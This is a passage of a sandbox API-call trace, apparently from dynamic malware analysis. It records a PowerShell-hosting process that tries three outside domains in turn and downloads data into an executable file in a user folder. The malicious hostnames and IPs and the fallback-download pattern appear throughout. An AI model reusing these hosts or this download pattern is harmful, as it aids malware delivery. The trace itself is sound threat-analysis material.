fInfoLevelId=0x0, lpFileInformation=0x1c6ed410 | out: lpFileInformation=0x1c6ed410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93664460, ftCreationTime.dwHighDateTime=0x1d4f2cf, ftLastAccessTime.dwLowDateTime=0x96e2e800, ftLastAccessTime.dwHighDateTime=0x1d4f2cf, ftLastWriteTime.dwLowDateTime=0x970b5f60, ftLastWriteTime.dwHighDateTime=0x1d4f2cf, nFileSizeHigh=0x0, nFileSizeLow=0x5d4)) returned 1 [0094.928] SetErrorMode (uMode=0x1) returned 0x1 [0094.929] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.947] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.948] SetErrorMode (uMode=0x1) returned 0x1 [0094.948] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0094.948] GetFileType (hFile=0x36c) returned 0x1 [0094.949] SetErrorMode (uMode=0x1) returned 0x1 [0094.949] GetFileType (hFile=0x36c) returned 0x1 [0094.949] SetEvent (hEvent=0x388) returned 1 [0094.950] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0094.950] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0094.950] getaddrinfo (in: pNodeName="nieuwhoftegelwerken.nl", pServiceName=0x0, pHints=0x1c6ed1d0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed1c8 | out: ppResult=0x1c6ed1c8*=0x1b2c61d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="nieuwhoftegelwerken.nl", ai_addr=0x1b3670*(sa_family=2, sin_port=0x0, sin_addr="195.8.208.98"), ai_next=0x0)) returned 0 [0094.952] CoTaskMemFree (pv=0x1b3630) [0094.952] CoTaskMemFree (pv=0x0) [0094.953] FreeAddrInfoW (pAddrInfo=0x1b2c61d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楮略桷景整敧睬牥敫⹮汮", ai_addr=0x1b3670*(sa_family=2, sin_port=0x0, sin_addr="195.8.208.98"), ai_next=0x0)) [0094.953] WSAConnect (in: s=0x4f4, name=0x2ea2d98*(sa_family=2, sin_port=0x50, sin_addr="195.8.208.98"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0094.986] closesocket (s=0x464) returned 0 [0094.987] send (s=0x4f4, buf=0x2ea3020*, len=79, flags=0) returned 79 [0094.987] setsockopt (s=0x4f4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0094.987] recv (in: s=0x4f4, buf=0x2ea1578, len=4096, flags=0 | out: buf=0x2ea1578*) returned 4096 [0095.030] setsockopt (s=0x4f4, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0095.030] recv (in: s=0x4f4, buf=0x2ea5120, len=947, flags=0 | out: buf=0x2ea5120*) returned 947 [0095.038] CloseHandle (hObject=0x36c) returned 1 [0095.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6e7d50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0095.038] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe")) returned 1 [0095.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8aa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.046] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0095.046] SetErrorMode (uMode=0x1) returned 0x1 [0095.046] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0095.047] GetFileType (hFile=0x36c) returned 0x1 [0095.047] SetErrorMode (uMode=0x1) returned 0x1 [0095.047] GetFileType (hFile=0x36c) returned 0x1 [0095.048] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0095.048] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x37c [0095.049] CoTaskMemAlloc (cb=0x15) returned 0x1b3670 [0095.049] getaddrinfo (in: pNodeName="uninortediverso.com", pServiceName=0x0, pHints=0x1c6ed1d0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed1c8 | out: ppResult=0x1c6ed1c8*=0x1b2c6290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="uninortediverso.com", ai_addr=0x1b3650*(sa_family=2, sin_port=0x0, sin_addr="104.31.93.251"), ai_next=0x1b2c62d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1b3630*(sa_family=2, sin_port=0x0, sin_addr="104.31.92.251"), ai_next=0x0))) returned 0 [0095.051] CoTaskMemFree (pv=0x1b3670) [0095.051] CoTaskMemFree (pv=0x0) [0095.051] FreeAddrInfoW (pAddrInfo=0x1b2c6290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="\x6e75\x6e69\x726f\x6574\x6964\x6576\x7372\x2e6f\x6f63\x6d\x38\x39\x27f0\x5478\x79\x8000\x2c\x66\x34\x36\x62\x32\x61\x32\x62\x31\x32\x34\x27f6\x5478\x79\x8000\x2e\x36\x35\x32\x62\x66\x35\x63\x33\x30\x38\x30\x27f4\x5478\x79\x8000\x30\x32\x62\x38\x0d\xd00\x954", ai_addr=0x1b3650*(sa_family=2, sin_port=0x0, sin_addr="104.31.93.251"), ai_next=0x1b2c62d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1b3630*(sa_family=2, sin_port=0x0, sin_addr="104.31.92.251"), ai_next=0x0))) [0095.051] WSAConnect (in: s=0x464, name=0x2eb84c0*(sa_family=2, sin_port=0x1bb, sin_addr="104.31.93.251"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0095.075] closesocket (s=0x37c) returned 0 [0095.084] EnumerateSecurityPackagesW (in: pcPackages=0x1c6ed048, ppPackageInfo=0x1c6ed040 | out: pcPackages=0x1c6ed048, ppPackageInfo=0x1c6ed040) returned 0x0 [0095.085] lstrlenW (lpString="Negotiate") returned 9 [0095.086] CoTaskMemAlloc (cb=0x16) returned 0x1b3630 [0095.086] RtlMoveMemory (in: Destination=0x1b3630, Source=0x1ad750, Length=0x14 | out: Destination=0x1b3630) [0095.086] FreeContextBuffer (in: pvContextBuffer=0x1ad610 | out: pvContextBuffer=0x1ad610) returned 0x0 [0095.090] GetCurrentProcess () returned 0xffffffffffffffff [0095.090] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecb28 | out: TokenHandle=0x1c6ecb28*=0x37c) returned 1 [0095.095] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2eb8de0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c6eca38, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c6eca28, ptsExpiry=0x1c6eca20 | out: phCredential=0x1c6eca28, ptsExpiry=0x1c6eca20) returned 0x0 [0095.102] InitializeSecurityContextW (in: phCredential=0x1c6ecc30, phContext=0x0, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c6ecc20, pOutput=0x2ebb508, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10 | out: phNewContext=0x1c6ecc20, pOutput=0x2ebb508, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10) returned 0x90312 [0095.102] FreeContextBuffer (in: pvContextBuffer=0x1baf00 | out: pvContextBuffer=0x1baf00) returned 0x0 [0095.109] send (s=0x464, buf=0x2ebb5d8*, len=123, flags=0) returned 123 [0095.110] recv (in: s=0x464, buf=0x2ebb5d8, len=5, flags=0 | out: buf=0x2ebb5d8*) returned 5 [0095.132] recv (in: s=0x464, buf=0x2ebb5dd, len=87, flags=0 | out: buf=0x2ebb5dd*) returned 87 [0095.133] InitializeSecurityContextW (in: phCredential=0x1c6ecb50, phContext=0x1c6ece00, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebb8a0, Reserved2=0x0, phNewContext=0x1c6ecb40, pOutput=0x2ebb8c0, pfContextAttr=0x1c6ecb38, ptsExpiry=0x1c6ecb30 | out: phNewContext=0x1c6ecb40, pOutput=0x2ebb8c0, pfContextAttr=0x1c6ecb38, ptsExpiry=0x1c6ecb30) returned 0x90312 [0095.133] recv (in: s=0x464, buf=0x2ebb9b0, len=5, flags=0 | out: buf=0x2ebb9b0*) returned 5 [0095.133] recv (in: s=0x464, buf=0x2ebb9d5, len=4242, flags=0 | out: buf=0x2ebb9d5*) returned 4242 [0095.133] InitializeSecurityContextW (in: phCredential=0x1c6eca80, phContext=0x1c6ecd30, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebcb38, Reserved2=0x0, phNewContext=0x1c6eca70, pOutput=0x2ebcb58, pfContextAttr=0x1c6eca68, ptsExpiry=0x1c6eca60 | out: phNewContext=0x1c6eca70, pOutput=0x2ebcb58, pfContextAttr=0x1c6eca68, ptsExpiry=0x1c6eca60) returned 0x90312 [0095.134] recv (in: s=0x464, buf=0x2ebcc48, len=5, flags=0 | out: buf=0x2ebcc48*) returned 5 [0095.134] recv (in: s=0x464, buf=0x2ebcc6d, len=146, flags=0 | out: buf=0x2ebcc6d*) returned 146 [0095.134] InitializeSecurityContextW (in: phCredential=0x1c6ec9b0, phContext=0x1c6ecc60, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebcdd0, Reserved2=0x0, phNewContext=0x1c6ec9a0, pOutput=0x2ebcdf0, pfContextAttr=0x1c6ec998, ptsExpiry=0x1c6ec990 | out: phNewContext=0x1c6ec9a0, pOutput=0x2ebcdf0, pfContextAttr=0x1c6ec998, ptsExpiry=0x1c6ec990) returned 0x90312 [0095.134] recv (in: s=0x464, buf=0x2ebcee0, len=5, flags=0 | out: buf=0x2ebcee0*) returned 5 [0095.134] recv (in: s=0x464, buf=0x2ebcf05, len=4, flags=0 | out: buf=0x2ebcf05*) returned 4 [0095.134] InitializeSecurityContextW (in: phCredential=0x1c6ec8e0, phContext=0x1c6ecb90, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebcfe0, Reserved2=0x0, phNewContext=0x1c6ec8d0, pOutput=0x2ebd000, pfContextAttr=0x1c6ec8c8, ptsExpiry=0x1c6ec8c0 | out: phNewContext=0x1c6ec8d0, pOutput=0x2ebd000, pfContextAttr=0x1c6ec8c8, ptsExpiry=0x1c6ec8c0) returned 0x90312 [0095.144] FreeContextBuffer (in: pvContextBuffer=0x1c11a0 | out: pvContextBuffer=0x1c11a0) returned 0x0 [0095.144] send (s=0x464, buf=0x2ebd0d0*, len=134, flags=0) returned 134 [0095.144] recv (in: s=0x464, buf=0x2ebd0d0, len=5, flags=0 | out: buf=0x2ebd0d0*) returned 5 [0095.158] recv (in: s=0x464, buf=0x2ebd0d5, len=1, flags=0 | out: buf=0x2ebd0d5*) returned 1 [0095.159] InitializeSecurityContextW (in: phCredential=0x1c6ec810, phContext=0x1c6ecac0, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebd248, Reserved2=0x0, phNewContext=0x1c6ec800, pOutput=0x2ebd268, pfContextAttr=0x1c6ec7f8, ptsExpiry=0x1c6ec7f0 | out: phNewContext=0x1c6ec800, pOutput=0x2ebd268, pfContextAttr=0x1c6ec7f8, ptsExpiry=0x1c6ec7f0) returned 0x90312 [0095.159] recv (in: s=0x464, buf=0x2ebd358, len=5, flags=0 | out: buf=0x2ebd358*) returned 5 [0095.159] recv (in: s=0x464, buf=0x2ebd37d, len=48, flags=0 | out: buf=0x2ebd37d*) returned 48 [0095.159] InitializeSecurityContextW (in: phCredential=0x1c6ec740, phContext=0x1c6ec9f0, pTargetName=0x2eb5938, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ebd480, Reserved2=0x0, phNewContext=0x1c6ec730, pOutput=0x2ebd4a0, pfContextAttr=0x1c6ec728, ptsExpiry=0x1c6ec720 | out: phNewContext=0x1c6ec730, pOutput=0x2ebd4a0, pfContextAttr=0x1c6ec728, ptsExpiry=0x1c6ec720) returned 0x0 [0095.168] QueryContextAttributesW (in: phContext=0x1c6ec9a0, ulAttribute=0x4, pBuffer=0x2ebd5b8 | out: pBuffer=0x2ebd5b8) returned 0x0 [0095.169] QueryContextAttributesW (in: phContext=0x1c6ec9a0, ulAttribute=0x5a, pBuffer=0x2ebd638 | out: pBuffer=0x2ebd638) returned 0x0 [0095.176] QueryContextAttributesW (in: phContext=0x1c6ec850, ulAttribute=0x53, pBuffer=0x2ebd988 | out: pBuffer=0x2ebd988) returned 0x0 [0095.200] CertDuplicateCRLContext (pCrlContext=0x1b2ae270) returned 0x1b2ae270 [0095.204] CertDuplicateStore (hCertStore=0x180ab0) returned 0x180ab0 [0095.205] CertEnumCertificatesInStore (hCertStore=0x180ab0, pPrevCertContext=0x0) returned 0x1b2ae370 [0095.205] CertDuplicateCRLContext (pCrlContext=0x1b2ae370) returned 0x1b2ae370 [0095.206] CertEnumCertificatesInStore (hCertStore=0x180ab0, pPrevCertContext=0x1b2ae370) returned 0x1b2ae2f0 [0095.206] CertDuplicateCRLContext (pCrlContext=0x1b2ae2f0) returned 0x1b2ae2f0 [0095.206] CertEnumCertificatesInStore (hCertStore=0x180ab0, pPrevCertContext=0x1b2ae2f0) returned 0x1b2ae270 [0095.206] CertDuplicateCRLContext (pCrlContext=0x1b2ae270) returned 0x1b2ae270 [0095.206] CertEnumCertificatesInStore (hCertStore=0x180ab0, pPrevCertContext=0x1b2ae270) returned 0x0 [0095.206] CertCloseStore (hCertStore=0x180ab0, dwFlags=0x0) returned 1 [0095.206] CertFreeCRLContext (pCrlContext=0x1b2ae270) returned 1 [0095.273] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1809e0 [0095.273] CertAddCRLLinkToStore (in: hCertStore=0x1809e0, pCrlContext=0x1b2ae370, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0095.274] CertAddCRLLinkToStore (in: hCertStore=0x1809e0, pCrlContext=0x1b2ae2f0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0095.274] CertAddCRLLinkToStore (in: hCertStore=0x1809e0, pCrlContext=0x1b2ae270, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0095.276] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b2ae270, pTime=0x1c6ec858, hAdditionalStore=0x1809e0, pChainPara=0x1c6ec860, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c6ec850 | out: ppChainContext=0x1c6ec850) returned 1 [0095.593] CertDuplicateCertificateChain (pChainContext=0x1ccce3c0) returned 0x1ccce3c0 [0095.593] CertDuplicateCRLContext (pCrlContext=0x1b2ae270) returned 0x1b2ae270 [0095.594] CertDuplicateCRLContext (pCrlContext=0x1cd1fa40) returned 0x1cd1fa40 [0095.594] CertDuplicateCRLContext (pCrlContext=0x1cd1fac0) returned 0x1cd1fac0 [0095.594] CertFreeCertificateChain (pChainContext=0x1ccce3c0) [0095.594] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ccce3c0, pPolicyPara=0x1c6ec9d8, pPolicyStatus=0x1c6ec9b8 | out: pPolicyStatus=0x1c6ec9b8) returned 1 [0095.595] SetLastError (dwErrCode=0x0) [0095.595] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ccce3c0, pPolicyPara=0x1c6ecab0, pPolicyStatus=0x1c6eca98 | out: pPolicyStatus=0x1c6eca98) returned 1 [0095.597] CertFreeCertificateChain (pChainContext=0x1ccce3c0) [0095.597] CertFreeCRLContext (pCrlContext=0x1b2ae270) returned 1 [0095.601] EncryptMessage (in: phContext=0x1c6ed060, fQOP=0x0, pMessage=0x2ec0968, MessageSeqNo=0x0 | out: pMessage=0x2ec0968) returned 0x0 [0095.601] send (s=0x464, buf=0x2ec06a8*, len=117, flags=0) returned 117 [0095.601] setsockopt (s=0x464, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0095.601] recv (in: s=0x464, buf=0x2ec0a60, len=5, flags=0 | out: buf=0x2ec0a60*) returned 5 [0095.658] recv (in: s=0x464, buf=0x2ec0a85, len=640, flags=0 | out: buf=0x2ec0a85*) returned 640 [0095.659] DecryptMessage (in: phContext=0x1c6ecc20, pMessage=0x2ec0e18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ec0e18, pfQOP=0x0) returned 0x0 [0095.659] setsockopt (s=0x464, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0095.660] recv (in: s=0x464, buf=0x2ec0a80, len=5, flags=0 | out: buf=0x2ec0a80*) returned 5 [0095.660] recv (in: s=0x464, buf=0x2ec0a85, len=32, flags=0 | out: buf=0x2ec0a85*) returned 32 [0095.660] DecryptMessage (in: phContext=0x1c6ecb20, pMessage=0x2ec2a20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ec2a20, pfQOP=0x0) returned 0x0 [0095.663] QueryContextAttributesW (in: phContext=0x1c6ece20, ulAttribute=0x1a, pBuffer=0x1c6ecfa0 | out: pBuffer=0x1c6ecfa0) returned 0x0 [0095.665] DeleteSecurityContext (phContext=0x1c6ec5f0) returned 0x0 [0095.666] shutdown (s=0x464, how=2) returned 0 [0095.667] closesocket (s=0x464) returned 0 [0095.668] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6e7d50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0095.668] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe")) returned 1 [0095.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8aa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0095.673] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0095.673] SetErrorMode (uMode=0x1) returned 0x1 [0095.673] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0095.674] GetFileType (hFile=0x36c) returned 0x1 [0095.674] SetErrorMode (uMode=0x1) returned 0x1 [0095.674] GetFileType (hFile=0x36c) returned 0x1 [0095.674] SetEvent (hEvent=0x388) returned 1 [0095.674] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0095.674] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x6a8 [0095.675] getaddrinfo (in: pNodeName="vigor-dragon.com", pServiceName=0x0, pHints=0x1c6ed1d0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed1c8 | out: ppResult=0x1c6ed1c8*=0x1cd1ac30*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="vigor-dragon.com", ai_addr=0x1cccb5e0*(sa_family=2, sin_port=0x0, sin_addr="47.89.211.238"), ai_next=0x0)) returned 0 [0095.677] CoTaskMemFree (pv=0x1cccb640) [0095.677] CoTaskMemFree (pv=0x0) [0095.677] FreeAddrInfoW (pAddrInfo=0x1cd1ac30*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楶潧⵲牤条湯挮浯", ai_addr=0x1cccb5e0*(sa_family=2, sin_port=0x0, sin_addr="47.89.211.238"), ai_next=0x0)) [0095.678] WSAConnect (in: s=0x464, name=0x2ed18f8*(sa_family=2, sin_port=0x1bb, sin_addr="47.89.211.238"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0095.835] closesocket (s=0x6a8) returned 0 [0095.836] InitializeSecurityContextW (in: phCredential=0x1c6ecc30, phContext=0x0, pTargetName=0x2ecee88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c6ecc20, pOutput=0x2ed20d8, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10 | out: phNewContext=0x1c6ecc20, pOutput=0x2ed20d8, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10) returned 0x90312 [0095.836] FreeContextBuffer (in: pvContextBuffer=0x1ba780 | out: pvContextBuffer=0x1ba780) returned 0x0 [0095.836] send (s=0x464, buf=0x2ed21a8*, len=120, flags=0) returned 120 [0095.836] recv (in: s=0x464, buf=0x2ed21a8, len=5, flags=0 | out: buf=0x2ed21a8) returned 0 [0096.080] DeleteSecurityContext (phContext=0x1c6ea400) returned 0x0 [0096.416] shutdown (s=0x464, how=2) returned 0 [0096.417] setsockopt (s=0x464, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0096.417] closesocket (s=0x464) returned 0 [0096.417] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0096.417] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x6a8 [0096.418] WSAConnect (in: s=0x464, name=0x2ed5268*(sa_family=2, sin_port=0x1bb, sin_addr="47.89.211.238"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0096.574] closesocket (s=0x6a8) returned 0 [0096.574] InitializeSecurityContextW (in: phCredential=0x1c6ecc30, phContext=0x0, pTargetName=0x2ecee88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c6ecc20, pOutput=0x2ed5a08, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10 | out: phNewContext=0x1c6ecc20, pOutput=0x2ed5a08, pfContextAttr=0x1c6ecc18, ptsExpiry=0x1c6ecc10) returned 0x90312 [0096.575] FreeContextBuffer (in: pvContextBuffer=0x1ba780 | out: pvContextBuffer=0x1ba780) returned 0x0 [0096.575] send (s=0x464, buf=0x2ed5ad8*, len=120, flags=0) returned 120 [0096.575] recv (in: s=0x464, buf=0x2ed5ad8, len=5, flags=0 | out: buf=0x2ed5ad8) returned 0 [0096.733] DeleteSecurityContext (phContext=0x1c6ea400) returned 0x0 [0096.736] shutdown (s=0x464, how=2) returned 0 [0096.736] setsockopt (s=0x464, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0096.736] closesocket (s=0x464) returned 0 [0096.737] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6e7d50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0096.737] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe")) returned 1 [0096.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8aa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e89f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.859] SetEvent (hEvent=0x334) returned 1 